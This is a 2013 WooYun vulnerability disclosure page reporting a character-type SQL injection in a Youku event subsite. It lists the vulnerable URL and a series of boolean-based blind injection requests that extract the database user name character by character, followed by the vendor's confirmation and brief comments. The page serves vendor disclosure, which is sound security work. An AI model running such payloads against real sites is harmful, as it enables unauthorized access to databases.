当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-031626

漏洞标题:优酷某分站SQL注入一枚

相关厂商:优酷

漏洞作者: 1ee

提交时间:2013-07-21 14:53

修复时间:2013-09-04 14:54

公开时间:2013-09-04 14:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-21: 细节已通知厂商并且等待厂商处理中
2013-07-21: 厂商已经确认,细节仅向厂商公开
2013-07-31: 细节向核心白帽子及相关领域专家公开
2013-08-10: 细节向普通白帽子公开
2013-08-20: 细节向实习白帽子公开
2013-09-04: 细节向公众公开

简要描述:

看见奇迹挖洞,我也来了

详细说明:

首先注入点:http://events.youku.com/zuqiubaobei/index.php?realname=李燕
(这个李燕我不认识,就随便找个注入)
该注入点为字符型注入

QQ截图20130721144138.jpg


QQ截图20130721144147.jpg


接下来

http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,1,1%29%29=115,1,0%29%29=1%20and%20%271%27=%271  // s
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,2,1%29%29=108,1,0%29%29=1%20and%20%271%27=%271 // l
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,3,1%29%29=97,1,0%29%29=1%20and%20%271%27=%271 //a
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,4,1%29%29=118,1,0%29%29=1%20and%20%271%27=%271 //v
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,5,1%29%29=101,1,0%29%29=1%20and%20%271%27=%271 //e
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,6,1%29%29=95,1,0%29%29=1%20and%20%271%27=%271 //_
http://events.youku.com/zuqiubaobei/index.php?realname=李燕' and (select if(ascii(substring(user(),7,1))=114,1,0))=1 and '1'='1 //r
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,8,1%29%29=101,1,0%29%29=1%20and%20%271%27=%271 //e
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,9,1%29%29=97,1,0%29%29=1%20and%20%271%27=%271 //a
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,10,1%29%29=100,1,0%29%29=1%20and%20%271%27=%271 d
http://events.youku.com/zuqiubaobei/index.php?realname=%E6%9D%8E%E7%87%95%27%20and%20%28select%20if%28ascii%28substring%28user%28%29,11,1%29%29=101,1,0%29%29=1%20and%20%271%27=%271 e


不继续手工注入了- -

漏洞证明:

该注入点为字符型注入

QQ截图20130721144138.jpg


QQ截图20130721144147.jpg

修复方案:

你们更专业

版权声明:转载请注明来源 1ee@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-07-21 16:09

厂商回复:

修复中

最新状态:

暂无


漏洞评价:

评论

  1. 2013-07-21 15:02 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    麻烦把我的名字打对!谢谢合作

  2. 2013-07-21 15:04 | 1ee ( 普通白帽子 | Rank:105 漏洞数:14 | 看书中....)

    @齐迹 好吧- -

  3. 2013-07-21 15:06 | 1ee ( 普通白帽子 | Rank:105 漏洞数:14 | 看书中....)

    @齐迹 已经改了,等审核 - -

  4. 2013-07-21 15:09 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    @1ee 你真改了。。F了你了!

  5. 2013-07-21 15:16 | 1ee ( 普通白帽子 | Rank:105 漏洞数:14 | 看书中....)

    @齐迹 我真的改了- -,估计要忙死审核的